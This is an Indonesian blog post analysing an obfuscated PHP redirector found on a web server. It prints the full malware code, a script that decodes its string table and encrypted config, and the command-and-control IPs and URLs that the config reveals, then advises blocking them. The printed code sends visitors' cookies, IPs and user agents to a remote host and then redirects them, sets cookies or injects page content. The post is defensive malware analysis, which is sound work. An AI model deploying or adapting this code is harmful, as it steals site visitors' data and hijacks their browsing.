
decoding malware ddos UDP paket
October 27, 2017

Posted by cu.admin in: Linux

Contoh skrip malware yang ditemukan di server:

<blockquote>
&amp;lt;? /* Analyst notes: obfuscated PHP "TDS"/redirector found on the server. Every literal is fetched by index from the base64 table below through _1246590434($i); the decoded table is printed later in this post (index 0 = 'KYbZ4vc', 1 = 'h4H', 4 = 'mode', 5 = 'config', 21 = 'setconfig', 41 = 'kill'). */
function _1246590434($i){$a=Array('S1liWjR2Yw==','aDRI','','SCo=','bW9kZQ==','Y29uZmln','a2V5','a2V5','PGZvcm0gbmFtZT0iZm9ybTEiIG1ldGhvZD0icG9zdCIgYWN0aW9uPT9tb2RlPXNldGNvbmZpZyZrZXk9','a2V5','PjxwcmU+ClREUzogICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdGRzIiB2YWx1ZT0i','dXJs','Ij4gIFREUyBJUDogIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdGRzaXAiIHZhbHVlPSI=','aXA=','Ij4KS0VZOiAgICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBrZXkiIHZhbHVlPSI=','a2V5','Ij4gIFJlc2VydmU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdG8iIHZhbHVlPSI=','bGlu','Ij4KSUQ6ICAgICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBlc2RpZCIgdmFsdWU9Ig==','aWQ=','Ij4gIDxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9IlN1Ym1pdCIgdmFsdWU9Im9rIj48L3ByZT4KPC9mb3JtPg==','c2V0Y29uZmln','a2V5','a2V5','Lw==','U0NSSVBUX05BTUU=','dXJs','cHRkcw==','aXA=','cHRkc2lw','bGlu','cHRv','aWQ=','cGVzZGlk','a2V5','cGtleQ==','YWNjX2lk','YWNjX2lk','dw==','','U2F2ZWQuCg==','a2lsbA==','a2V5','a2V5','Nzc3','U0NSSVBUX0ZJTEVOQU1F','U0NSSVBUX0ZJTEVOQU1F','b2sK','Lw==','dXJs','aXA=','aXA=','YWNjX2lk','YWNjX2lk','aHR0cDovLw==','SFRUUF9IT1NU','U0NSSVBUX05BTUU=','SFRUUF9SRUZFUkVS','UkVNT1RFX0FERFI=','bm8=','SFRUUF9YX0ZPUldBUkRFRF9GT1I=','eWVz','SFRUUF9VU0VSX0FHRU5U','aWQ=','aWQ=','a2V5','Jg==','a2V5','PQ==','UVVFUllfU1RSSU5H','R0VUIA==','dXJs','P2RvbT0=','JnJlZj0=','JmlwPQ==','JnByb3g9','JmFnZW50PQ==','JmNvb2tpZT0=','JmVzZGlkPQ==','aWQ=','JmZyYW1laWQ9','JmFjY19pZD0=','IEhUVFAvMS4wDQo=','SG9zdDog','DQo=','Q29ubmVjdGlvbjogQ2xvc2UNCg0K','DQo=','ZG8=','ZG8=','IA==','bGlu','MjAw','bGlu','Oi8v','aHR0cA==','SFRUUC8xLjEgMzAyIEZvdW5k','TG9jYXRpb246IA==','Y29vaw==','Jg==','PQ==','ZWNobw==');return<span id="more-14460"></span> base64_decode($a[$i]);} ?&amp;gt;&lt;!--?php error_reporting(0);$key=_1246590434(0);
/* string_cpt: keystream XOR. Each round appends the first 8 bytes of sha1(keystream . previous digest . salt 'h4H'); XOR is its own inverse, so the same call encrypts and decrypts. It works on raw bytes, hence strlen/substr. */
function string_cpt($String,$Password){$Salt=_1246590434(1);$StrLen=strlen($String);$Seq=$Password;$Gamma=_1246590434(2);while(strlen($Gamma)&amp;lt;$StrLen){$Seq=pack(_1246590434(3),sha1($Gamma .$Seq .$Salt));$Gamma .= substr($Seq,0,8);}return 
$String^$Gamma;}
/* $cfg (assigned on the first line of this same file) is base64 + string_cpt of serialize($c); $c carries url, ip, lin, id, key, acc_id. unserialize() runs on whatever that line holds. The three admin modes below are gated only by a loose (==) comparison of $c['key'] against the request's key parameter. */
$c=unserialize(string_cpt(base64_decode($cfg),$key));$mode=$_REQUEST[_1246590434(4)];
/* mode=config: echoes an HTML form (table indices 8..20) pre-filled with the current url/ip/key/lin/id, posting back to mode=setconfig. */
if($mode == _1246590434(5)AND $c[_1246590434(6)]== $_REQUEST[_1246590434(7)]){echo _1246590434(8) .$_REQUEST[_1246590434(9)] ._1246590434(10) .$c[_1246590434(11)] ._1246590434(12) .$c[_1246590434(13)] ._1246590434(14) .$c[_1246590434(15)] ._1246590434(16) .$c[_1246590434(17)] ._1246590434(18) .$c[_1246590434(19)] ._1246590434(20);die();}
/* mode=setconfig: takes the basename of SCRIPT_NAME, re-reads this file, re-encrypts the POSTed values into $cfg, replaces line 0 with a fresh "$cfg='...'" line and writes the whole file back ("Saved."). The script persists its own configuration in place. */
if($mode == _1246590434(21)AND $c[_1246590434(22)]== $_REQUEST[_1246590434(23)]){$sn=explode(_1246590434(24),$_SERVER[_1246590434(25)]);foreach($sn as $snn){$scr=$snn;}$getlpa=file($scr);$strng=$getlpa[0];$file=file($scr);for($i=0;$i&amp;lt;sizeof($file);$i++){if($i == 0){$c[_1246590434(26)]=$_POST[_1246590434(27)];$c[_1246590434(28)]=$_POST[_1246590434(29)];$c[_1246590434(30)]=$_POST[_1246590434(31)];$c[_1246590434(32)]=$_POST[_1246590434(33)];$c[_1246590434(34)]=$_POST[_1246590434(35)];$c[_1246590434(36)]=$_POST[_1246590434(37)];$cfg=base64_encode(string_cpt(serialize($c),$key));$file[$i]=&quot;&amp;lt;?\$cfg='$cfg'; ?--&gt;\n&quot;;}}$fp=fopen($scr,_1246590434(38));if(fputs($fp,implode(_1246590434(39),$file))){die(_1246590434(40));}fclose($fp);}
/* mode=kill: self-removal. chmod('777', SCRIPT_FILENAME) has path and mode swapped, so it is a no-op; unlink(SCRIPT_FILENAME) then deletes the script and prints "ok". */
if($mode == _1246590434(41)AND $c[_1246590434(42)]== $_REQUEST[_1246590434(43)]){chmod(_1246590434(44),$_SERVER[_1246590434(45)]);if(unlink($_SERVER[_1246590434(46)])){die(_1246590434(47));}}
/* Default path for every ordinary visitor: target host = $c['ip'] when set, else the host part of $c['url']; fsockopen to port 80 with a 2 s timeout. $dhost (the url host) is only used for the Host: header. */
$dom=explode(_1246590434(48),$c[_1246590434(49)]);$dom=$dom[2];$dhost=$dom;if($c[_1246590434(50)]){$dom=$c[_1246590434(51)];}if($c[_1246590434(52)]){$acc_id=$c[_1246590434(53)];}$fp=fsockopen($dom,80,$errno,$errstr,2);if(!$fp){$res=1;}else{
/* Collects the request URL, referer, REMOTE_ADDR, whether X-Forwarded-For is present, the user agent, frameid from $_GET['id'] and all cookies (QUERY_STRING when there are none), and sends them as GET parameters of $c['url'] together with $c['id'] and $c['acc_id']. Note the foreach writes cookie names into $c['key'], clobbering the in-memory key. */
$t_dom=urlencode(_1246590434(54) .$_SERVER[_1246590434(55)] 
.$_SERVER[_1246590434(56)]);$t_ref=urlencode($_SERVER[_1246590434(57)]);$t_ip=urlencode($_SERVER[_1246590434(58)]);$t_prox=_1246590434(59);if($_SERVER[_1246590434(60)]){$t_prox=_1246590434(61);}$t_agent=urlencode($_SERVER[_1246590434(62)]);if(isset($_GET[_1246590434(63)])){$t_frameid=urlencode($_GET[_1246590434(64)]);}foreach($_COOKIE as $c[_1246590434(65)]=&amp;gt; $val){$t_cookie=$t_cookie ._1246590434(66) .$c[_1246590434(67)] ._1246590434(68) .$val;}$t_cookie=urlencode($t_cookie);if(empty($t_cookie)){$t_cookie=urlencode($_SERVER[_1246590434(69)]);}$out=_1246590434(70) .$c[_1246590434(71)] ._1246590434(72) .$t_dom ._1246590434(73) .$t_ref ._1246590434(74) .$t_ip ._1246590434(75) .$t_prox ._1246590434(76) .$t_agent ._1246590434(77) .$t_cookie ._1246590434(78) .$c[_1246590434(79)];if(isset($t_frameid)){$out .= _1246590434(80) .$t_frameid;}if(isset($acc_id)){$out .= _1246590434(81) .$acc_id;}$out .= _1246590434(82);$out .= _1246590434(83) .$dhost ._1246590434(84);$out .= _1246590434(85);fwrite($fp,$out);
/* Reads the reply line by line; $he flips to 'do' at the blank line that ends the headers, after which every line (starting with that CRLF) is collected into $goto. */
while(!feof($fp)){$str=fgets($fp,128);$ch .= $str;if($str == _1246590434(86)&amp;amp;&amp;amp; empty($he)){$he=_1246590434(87);}if($he == _1246590434(88)){$goto .= $str;}}fclose($fp);}
/* Directive handling: drop the leading CRLF; the status code is the second space-separated token of the raw response. A connect failure ($res) or a non-200 status falls back to $c['lin'] (the "Reserve" URL). The body's scheme selects the action: http://... -> 302 Location redirect; cook://k=v&... -> setcookie() per pair; echo://... -> body printed verbatim into the page. */
$goto=substr($goto,2);$ch=explode(_1246590434(89),$ch);if($res){$goto=$c[_1246590434(90)];}if($ch[1]== _1246590434(91)){}else{$goto=$c[_1246590434(92)];}$gotoe=explode(_1246590434(93),$goto);If($gotoe[0]== _1246590434(94)){header(_1246590434(95));header(_1246590434(96) .$goto);}$goto_body=substr($goto,7);If($gotoe[0]== _1246590434(97)){$gotoee=explode(_1246590434(98),$goto_body);foreach($gotoee as $setcook){$set=explode(_1246590434(99),$setcook);setcookie($set[0],$set[1]);}}If($gotoe[0]== _1246590434(100)){echo $goto_body;} 
/* Defender notes: indicators visible in this sample are the first-line $cfg= blob paired with a numeric _NNNNNNNNNN() string-table decoder, requests carrying mode=config|setconfig|kill with a key parameter, and outbound port-80 connections from the web server to the configured TDS host. */

== Setelah string-string tersebut kita decode, hasilnya akan terlihat seperti berikut ==
/*

<?php
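// String table lifted verbatim from the sample: every literal the malware
// uses, base64-encoded, addressed by index through _1246590434($i).
$a = ['S1liWjR2Yw==','aDRI','','SCo=','bW9kZQ==','Y29uZmln','a2V5','a2V5','PGZvcm0gbmFtZT0iZm9ybTEiIG1ldGhvZD0icG9zdCIgYWN0aW9uPT9tb2RlPXNldGNvbmZpZyZrZXk9','a2V5','PjxwcmU+ClREUzogICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdGRzIiB2YWx1ZT0i','dXJs','Ij4gIFREUyBJUDogIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdGRzaXAiIHZhbHVlPSI=','aXA=','Ij4KS0VZOiAgICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBrZXkiIHZhbHVlPSI=','a2V5','Ij4gIFJlc2VydmU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdG8iIHZhbHVlPSI=','bGlu','Ij4KSUQ6ICAgICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBlc2RpZCIgdmFsdWU9Ig==','aWQ=','Ij4gIDxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9IlN1Ym1pdCIgdmFsdWU9Im9rIj48L3ByZT4KPC9mb3JtPg==','c2V0Y29uZmln','a2V5','a2V5','Lw==','U0NSSVBUX05BTUU=','dXJs','cHRkcw==','aXA=','cHRkc2lw','bGlu','cHRv','aWQ=','cGVzZGlk','a2V5','cGtleQ==','YWNjX2lk','YWNjX2lk','dw==','','U2F2ZWQuCg==','a2lsbA==','a2V5','a2V5','Nzc3','U0NSSVBUX0ZJTEVOQU1F','U0NSSVBUX0ZJTEVOQU1F','b2sK','Lw==','dXJs','aXA=','aXA=','YWNjX2lk','YWNjX2lk','aHR0cDovLw==','SFRUUF9IT1NU','U0NSSVBUX05BTUU=','SFRUUF9SRUZFUkVS','UkVNT1RFX0FERFI=','bm8=','SFRUUF9YX0ZPUldBUkRFRF9GT1I=','eWVz','SFRUUF9VU0VSX0FHRU5U','aWQ=','aWQ=','a2V5','Jg==','a2V5','PQ==','UVVFUllfU1RSSU5H','R0VUIA==','dXJs','P2RvbT0=','JnJlZj0=','JmlwPQ==','JnByb3g9','JmFnZW50PQ==','JmNvb2tpZT0=','JmVzZGlkPQ==','aWQ=','JmZyYW1laWQ9','JmFjY19pZD0=','IEhUVFAvMS4wDQo=','SG9zdDog','DQo=','Q29ubmVjdGlvbjogQ2xvc2UNCg0K','DQo=','ZG8=','ZG8=','IA==','bGlu','MjAw','bGlu','Oi8v','aHR0cA==','SFRUUC8xLjEgMzAyIEZvdW5k','TG9jYXRpb246IA==','Y29vaw==','Jg==','PQ==','ZWNobw=='];

// Dump every entry as 'index:value' so the numeric indices in the
// obfuscated code can be read against their clear-text meaning. Iterating
// the array itself (instead of a hard-coded 0..200) avoids the undefined
// offset notices and empty entries the original loop produced past the
// last index (100).
foreach ($a as $x => $encoded) {
    echo " '", $x, ':', base64_decode($encoded);
}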
// Output: 'KYbZ4vc 'h4H ... -- indeks 0 dan 1 adalah key dan Salt yang digunakan untuk membaca variabel $cfg

Langsung saja: setelah di-decode, hasilnya seperti ini. Kita hanya membutuhkan password/key dan salt-nya untuk membaca variabel $cfg.

<?php
 
// Config blob copied from the first line of the infected script (the
// "$cfg='...'" line that mode=setconfig rewrites). It is
// base64( string_cpt( serialize($c), $key ) ), so the same XOR routine
// with the same key turns it back into a serialize() string.
$cfg = 'UjL0xWPyXdB773KutcRiubsC78avF2CeLWQfgThnKO2T5G+BXwUL0orAd9t2qSb0yl2bQs+itHdLwa0RwBtp70/UZGShmAHANv4N2hyWxim41AeToMQkm5NejMmCNjQIGY9Pz7ktedFKVuqPFjXsXwkOfsuCuzAM01XsmfWA0Iquq4ZZPzvOr7Aug
r6Us2T1DRhBQg0h9wL0RTUAFHQHSoCsFFTIYFWLdwTWdVKzvfhotl1vC6VSgc71o6TR5ZlSaKYDYLv5sPubgpXiGkIr60zBa+FVZDp6TsZatqV8Eko9pSpDHQGbSvn97w=='; 
 
// Table index 0 of the sample, used as $Password for string_cpt. The salt
// 'h4H' (index 1) is hard-coded inside the function itself.
$key = 'KYbZ4vc'; 
function string_cpt($String, $Password) { 
    // Keystream ("gamma") XOR as used by the sample: every round hashes the
    // keystream produced so far, the previous raw digest and a fixed salt,
    // and contributes the first 8 bytes of the new digest. XOR is its own
    // inverse, so this one function both encrypts and decrypts; here it
    // decrypts the $cfg blob with $key passed as $Password.
    $salt = 'h4H';
    $needed = strlen($String);
    // 8 keystream bytes per round, so this many rounds cover the input.
    $rounds = (int) ceil($needed / 8);
    $digest = $Password;
    $gamma = '';
    for ($round = 0; $round < $rounds; $round++) {
        $digest = pack('H*', sha1($gamma . $digest . $salt));
        $gamma .= substr($digest, 0, 8);
    }
    // PHP's string XOR truncates to the shorter operand; $gamma is never
    // shorter than $String, so the result keeps the input length.
    return $String ^ $gamma;
} 
// Reverse the storage transform (base64, then the string_cpt XOR) and dump
// the resulting serialize() string; its fields are listed right below.
$blob = base64_decode($cfg);
$c = string_cpt($blob, $key);
echo $c;
 
?>

Hasilnya:

a:6:{s:3:"url";s:37:"http://185.104.9.3/xxbsds/jomerkx.php";s:2:"ip";s:11:"185.104.9.3";s:3:"lin";s:38:"http://93.170.13.88/xxbsds/jomerkx.php";s:2:"id";s:6:"475187";s:3:"key";s:22:"W5lO5Ga5p4zgp1anHqgMp2";s:6:"acc_id";s:8:"part11_m";}

Alamat IP di atas adalah server yang dihubungi malware; Anda bisa memblokir IP tersebut dari router Anda.

thanks

© http://carauntuk.com/decoding-malware-ddos-udp-paket

